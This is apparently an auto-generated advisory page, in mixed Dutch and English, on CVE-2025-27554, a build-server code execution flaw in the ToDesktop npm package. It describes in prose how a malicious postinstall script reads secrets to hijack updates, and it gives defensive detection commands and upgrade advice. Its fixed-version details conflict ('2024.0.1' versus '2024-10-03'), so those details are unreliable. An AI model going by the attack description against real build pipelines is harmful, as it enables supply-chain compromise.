Platform
nodejs
Component
todesktop
Opgelost in
2024.0.1
CVE-2025-27554 describes a critical remote code execution (RCE) vulnerability affecting ToDesktop, a Node.js package used by Cursor and other applications. This vulnerability allows attackers to execute arbitrary commands on the build server, potentially leading to unauthorized access and data breaches. The vulnerability impacts versions of ToDesktop prior to 2024-10-03, and has been fixed in version 2024-10-03.
The primary impact of CVE-2025-27554 is the ability for a remote attacker to execute arbitrary commands on the build server. This is achieved through a malicious postinstall script within the package.json file. Successful exploitation allows the attacker to read sensitive information, such as secrets stored in the desktopify config.prod.json file. This compromised data could then be used to deploy malicious updates to applications, effectively gaining control over the deployment pipeline. The blast radius extends to any application utilizing the vulnerable version of ToDesktop, potentially impacting a wide range of users and systems.
CVE-2025-27554 was publicly disclosed on 2025-03-01. No active exploitation has been reported at the time of writing, but the vulnerability's CRITICAL severity and ease of exploitation suggest a high probability of future attacks. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is likely to emerge given the vulnerability's nature and severity.
Applications that utilize the ToDesktop Node.js package, particularly those with automated build and deployment pipelines, are at significant risk. Projects relying on Cursor or other applications that transitively depend on ToDesktop are also vulnerable. Shared hosting environments where multiple projects share a build server are especially susceptible.
• nodejs / supply-chain:
npm list ToDesktop• nodejs / supply-chain:
grep -r 'postinstall' package.json• nodejs / supply-chain:
find . -name 'desktopify config.prod.json' -printdisclosure
patch
Exploit Status
EPSS
0.43% (63% percentiel)
CISA SSVC
CVSS-vector
The primary mitigation for CVE-2025-27554 is to immediately upgrade ToDesktop to version 2024-10-03 or later. If upgrading is not immediately feasible due to compatibility issues or breaking changes, consider temporarily restricting access to the build server and carefully reviewing any newly installed packages. Implement stricter access controls and auditing on the build server to detect and prevent unauthorized command execution. Review the desktopify config.prod.json file and ensure sensitive data is properly secured and not accessible to unauthorized users. After upgrading, confirm the fix by running npm install and verifying that the postinstall script executes without errors and does not attempt to access sensitive files.
Werk de 'todesktop' afhankelijkheid bij naar een versie later dan 2024-10-02. Dit voorkomt de remote uitvoering van commando's op de build server via het postinstall script in package.json. Raadpleeg de ToDesktop blog voor meer informatie over de kwetsbaarheid en de beveiligingsmaatregelen die zijn geïmplementeerd.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2025-27554 is a critical remote code execution vulnerability in ToDesktop versions before 2024-10-03. It allows attackers to execute commands on the build server, potentially accessing sensitive data.
You are affected if you are using ToDesktop versions prior to 2024-10-03, or if you use Cursor or other applications that depend on a vulnerable version of ToDesktop.
Upgrade ToDesktop to version 2024-10-03 or later. If immediate upgrade is not possible, restrict build server access and review installed packages.
No active exploitation has been reported, but the vulnerability's severity suggests a high probability of future attacks.
Refer to the relevant security advisories from the ToDesktop project and any dependent applications like Cursor for detailed information and updates.
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.